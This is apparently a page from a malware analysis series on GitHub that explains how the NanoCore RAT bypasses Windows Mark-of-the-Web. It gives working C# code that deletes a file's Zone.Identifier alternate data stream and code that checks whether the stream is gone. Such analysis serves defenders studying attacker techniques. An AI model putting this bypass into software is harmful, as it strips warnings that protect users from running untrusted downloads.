MalwareAnalysisSeries
This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules
Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham
NanoCore 1.2.2.0: MOTW Bypass
NanoCore have the capability to bypass Mark-of-the-Web. The “Mark of the Web” (MOTW) is a security feature in Windows that identifies files downloaded from the internet or other untrusted sources. It adds a Zone.Identifier alternate data stream (ADS) to the file, indicating its origin. This information helps Windows and applications like browsers and Office to determine whether to apply additional security measures, such as opening the file in Protected View or warning the user before execution.
MOTW can easily be bypassed by deleting the Zone.Identifier, but remember ADS or Alternate data stream files can’t be deleted normally. It needs APIs that can access ADS. In case of NanoCore 1.2.2.0, it imports a Win32 API of DeleteFile to delete the ADS Zone.Identifier of a file.
Implementation
Imports
To delete an ADS file, we need Win32 API DeleteFile. We must import the API first.
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool DeleteFile(string lpFileName);
Remove MOTW
Removing MOTW (Mark-of-the-Web) is pretty simple. Each MOTW contains an ADS file which can be accessed by appending :Zone.Identifier to the end of the file. We only need to delete the Zone.Identifier File, which would remove all Mark-of-the-Web tags.
Example: if a file is in C:\Users\Public\Test.pdf, then its mark-of-the-web would be in file C:\Users\Public\Test.pdf:Zone.Identifier”
static void Main(string[] args)
{
//Clear Zone Identifier
if (clearZone(Assembly.GetExecutingAssembly().Location))
{
Console.WriteLine("Zone.Identifier Deleted Successfully");
}
else
{
Console.WriteLine("Failed to Delete Zone.Identifier");
}
}
static bool clearZone(string path)
{
if (DeleteFile(path + ":Zone.Identifier"))
return true;
else
return false;
}
Verify MOTW Bypass
Since Zone.Identifier is an ADS (Alternate Data Stream) file, therefore it can’t be accessed normally like other files. We need special win32 APIs that can access or read ADS supported files. For that we must import the APIs and then use them to verify weather the Zone.Identifier has been deleted or not.
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
static extern IntPtr CreateFile(
string lpFileName,
uint dwDesiredAccess,
uint dwShareMode,
IntPtr lpSecurityAttributes,
uint dwCreationDisposition,
uint dwFlagsAndAttributes,
IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ReadFile(
IntPtr hFile,
[Out] byte[] lpBuffer,
uint nNumberOfBytesToRead,
out uint lpNumberOfBytesRead,
IntPtr lpOverlapped);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr hObject);
static void Main(string[] args)
{
//Check Zone Identifier
if (!HasZoneIdentifier(Assembly.GetExecutingAssembly().Location))
{
Console.WriteLine(":Zone.Identifier deleted");
}
else
{
Console.WriteLine("Failed to delete :Zone.Identifier");
}
}
static bool HasZoneIdentifier(string filePath)
{
string file_zone = filePath + ":Zone.Identifier";
// Open the ADS using CreateFile
IntPtr hFile = CreateFile(file_zone, 0x80000000, 1, IntPtr.Zero, 3, 0, IntPtr.Zero);
if (hFile.ToInt64() != -1)
{
byte[] buffer = new byte[1024];
uint bytesRead;
if (ReadFile(hFile, buffer, (uint)buffer.Length, out bytesRead, IntPtr.Zero))
{
string content = Encoding.UTF8.GetString(buffer, 0, (int)bytesRead);
Console.WriteLine("ADS Content: " + content);
}
CloseHandle(hFile);
}
else
{
Console.WriteLine("Failed to open ADS or ADS does not exist.");
return false;
}
return true;
}
Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries
Disclaimer
Artifacts and code of this repository is intended to be used for educational purposes only!!!